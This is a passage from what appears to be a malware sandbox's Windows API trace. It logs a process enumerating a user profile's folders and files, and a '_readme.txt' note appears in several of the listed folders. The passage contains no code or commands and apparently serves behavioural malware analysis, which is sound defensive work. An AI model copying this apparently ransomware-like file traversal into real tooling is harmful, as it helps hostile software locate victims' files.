ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5548 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0227.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c319580, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c33f6e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0227.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c319580, ftCreationTime.dwHighDateTime=0x1d5fd35, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c33f6e0, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0227.742] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbd8 | out: hHeap=0x630000) returned 1 [0227.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.742] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.743] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.743] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.743] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.743] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.743] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0227.743] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.743] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.743] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.743] PathFindFileNameW (pszPath="") returned="" [0227.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.743] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x202aaf60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x202aaf60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0227.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0227.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0227.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0227.744] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.744] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0227.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.744] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.744] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.744] PathFindFileNameW (pszPath="") returned="" [0227.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc0b4c00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc0b4c00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0227.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3bf8 | out: hHeap=0x630000) returned 1 [0227.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.745] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0227.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.745] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.745] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.745] PathFindFileNameW (pszPath="") returned="" [0227.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0227.746] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0227.746] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.746] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0227.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.746] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.747] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.747] PathFindFileNameW (pszPath="") returned="" [0227.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0227.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.748] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.748] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0227.748] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.748] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.748] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.748] PathFindFileNameW (pszPath="") returned="" [0227.748] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3043410, ftCreationTime.dwHighDateTime=0x1d5de20, ftLastAccessTime.dwLowDateTime=0x5d31ea0, ftLastAccessTime.dwHighDateTime=0x1d5e146, ftLastWriteTime.dwLowDateTime=0x5d31ea0, ftLastWriteTime.dwHighDateTime=0x1d5e146, nFileSizeHigh=0x0, nFileSizeLow=0x144f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ZkT JS.bmp", cAlternateFileName="-ZKTJS~1.BMP")) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0wlw97NT", cAlternateFileName="")) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="74 ZPVMU", cAlternateFileName="74ZPVM~1")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e23ce0, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x223a16e0, ftLastAccessTime.dwHighDateTime=0x1d5db95, ftLastWriteTime.dwLowDateTime=0x223a16e0, ftLastWriteTime.dwHighDateTime=0x1d5db95, nFileSizeHigh=0x0, nFileSizeLow=0x8d0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7GTeFnWqgS9ZSpp-9d.png", cAlternateFileName="7GTEFN~1.PNG")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca041790, ftCreationTime.dwHighDateTime=0x1d5e07c, ftLastAccessTime.dwLowDateTime=0x136c8240, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0x136c8240, ftLastWriteTime.dwHighDateTime=0x1d5e407, nFileSizeHigh=0x0, nFileSizeLow=0x1402c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AwaZ_7Drvt.mkv", cAlternateFileName="AWAZ_7~1.MKV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8572c0, ftCreationTime.dwHighDateTime=0x1d5db93, ftLastAccessTime.dwLowDateTime=0xfaa44010, ftLastAccessTime.dwHighDateTime=0x1d5e58f, ftLastWriteTime.dwLowDateTime=0xfaa44010, ftLastWriteTime.dwHighDateTime=0x1d5e58f, nFileSizeHigh=0x0, nFileSizeLow=0xe152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzVzcW.mp4", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa33730, ftCreationTime.dwHighDateTime=0x1d5de12, ftLastAccessTime.dwLowDateTime=0x43e13230, 